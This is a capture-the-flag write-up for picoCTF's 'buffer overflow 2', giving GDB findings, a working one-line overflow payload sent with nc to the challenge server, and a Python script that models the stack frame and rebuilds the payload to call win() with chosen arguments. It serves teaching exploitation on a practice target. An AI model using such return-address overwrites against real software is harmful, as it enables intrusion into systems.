buffer overflow 2

  1. vuln.c: we need to call win() with two arguments, 0xCAFEF00D and 0xF00DF00D
  2. GDB -> set breakpoint in vuln() after gets(), run and give a string of a's as input
  3. `disas win`, `info frame` (`i f`) and `x/100xg $ebp-200` give the following:
    • win() is at 0x08049296
    • buffer starts at ebp-0x6c
  4. We know that:
    • return address is at ebp+4
    • first arg is at ebp+8
  5. The following works:

    ```shell
    python3 -c 'import sys; sys.stdout.buffer.write(b"A"*0x70 + b"\x96\x92\x04\x08" + b"B"*4 + b"\x0d\xf0\xfe\xca" + b"\x0d\xf0\x0d\xf0\n")' | nc saturn.picoctf.net 50486
    ```
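Why the padding is 0x70 and why the arguments sit where they do: the added script below (my own worked example, not part of the original writeup) models the frame of vuln() at the moment it returns and builds the same payload from the three facts recovered in GDB. The helper names (`frame_layout`, `build_payload`, `args_as_seen_by_win`) are mine.

```python
import struct

# Facts from the writeup: buffer at ebp-0x6c, win() at 0x08049296, two args.
BUF_OFFSET = 0x6c
WIN_ADDR = 0x08049296
ARGS = (0xCAFEF00D, 0xF00DF00D)


def p32(v: int) -> bytes:
    """Pack a 32-bit value little-endian, as an x86 stack slot holds it."""
    return struct.pack("<I", v)


def frame_layout(buf_offset: int) -> dict:
    """Offsets (from vuln()'s ebp) of each payload region, with its size.
    Padding must cover the buffer (ebp-buf_offset .. ebp) plus the 4-byte
    saved ebp at ebp+0 before the return address at ebp+4 is reached.
    After `ret` pops that address, win() runs as if it had been called:
    its prologue makes win's ebp = vuln's ebp+4, so win's ebp+8 (arg1)
    is vuln's ebp+12 and win's ebp+12 (arg2) is vuln's ebp+16."""
    return {
        "padding": (-buf_offset, buf_offset + 4),   # 0x6c + 4 = 0x70 bytes
        "ret_addr_of_vuln": (4, 4),                 # overwritten with win()
        "ret_addr_of_win": (8, 4),                  # junk; never executed
        "arg1": (12, 4),
        "arg2": (16, 4),
    }


def build_payload(buf_offset: int, win_addr: int, args) -> bytes:
    """Assemble the input string in the order frame_layout() describes."""
    pad = frame_layout(buf_offset)["padding"][1]
    body = b"A" * pad + p32(win_addr) + b"B" * 4
    body += b"".join(p32(a) for a in args)
    return body + b"\n"


def args_as_seen_by_win(payload: bytes, buf_offset: int, nargs: int) -> tuple:
    """Decode the payload the way win() reads its parameters: the slot at
    vuln's ebp+12 is arg1, then 4 bytes per further argument."""
    start = buf_offset + frame_layout(buf_offset)["arg1"][0]
    return tuple(
        struct.unpack("<I", payload[start + 4 * i: start + 4 * i + 4])[0]
        for i in range(nargs)
    )


if __name__ == "__main__":
    p = build_payload(BUF_OFFSET, WIN_ADDR, ARGS)
    print(len(p), [hex(a) for a in args_as_seen_by_win(p, BUF_OFFSET, 2)])
```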